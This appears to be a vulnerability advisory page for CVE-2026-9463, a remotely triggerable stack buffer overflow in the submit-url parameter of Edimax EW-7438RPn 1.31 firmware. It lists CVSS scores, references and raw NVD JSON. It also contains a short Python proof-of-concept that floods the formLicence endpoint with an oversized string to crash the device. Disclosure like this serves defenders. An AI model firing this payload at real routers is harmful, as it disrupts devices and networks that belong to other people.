CVE-2026-9463

Description

A flaw has been found in Edimax EW-7438RPn 1.31. Affected by this issue is the function formLicence of the file /goform/formLicence. This manipulation of the argument submit-url causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Edimax EW-7438RPn 1.31

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable device
target_url = "http://192.168.1.1/goform/formLicence"

# Malicious payload: Long string to trigger stack overflow
# Adjust length based on specific buffer size (e.g., 500+ bytes)
payload = "A" * 1000

# Data to be sent in the POST request
# The vulnerability is in the 'submit-url' parameter
data = {
    "submit-url": payload
}

try:
    print("Sending exploit payload to target...")
    # Sending the POST request
    response = requests.post(target_url, data=data, timeout=5)
    
    # Check if the request was sent (device might crash before responding)
    if response.status_code == 200:
        print("Request sent successfully. Check device status for crash or shell.")
    else:
        print(f"Received status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    # Connection error often indicates the device has crashed (DoS)
    print(f"Connection failed: {e}")
    print("This may indicate a successful Denial of Service (DoS).")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-9463
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-9463
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-9463/
[4] VulDB https://vuldb.com/cve/CVE-2026-9463
[5] https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_16/16.md
[6] https://vuldb.com/submit/813900
[7] https://vuldb.com/vuln/365444
[8] https://vuldb.com/vuln/365444/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-9463", "sourceIdentifier": "[email protected]", "published": "2026-05-25T15:16:23.233", "lastModified": "2026-05-25T15:16:23.233", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Edimax EW-7438RPn 1.31. Affected by this issue is the function formLicence of the file /goform/formLicence. This manipulation of the argument submit-url causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_16/16.md", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/813900", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365444", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365444/cti", "source": "[email protected]"}]}}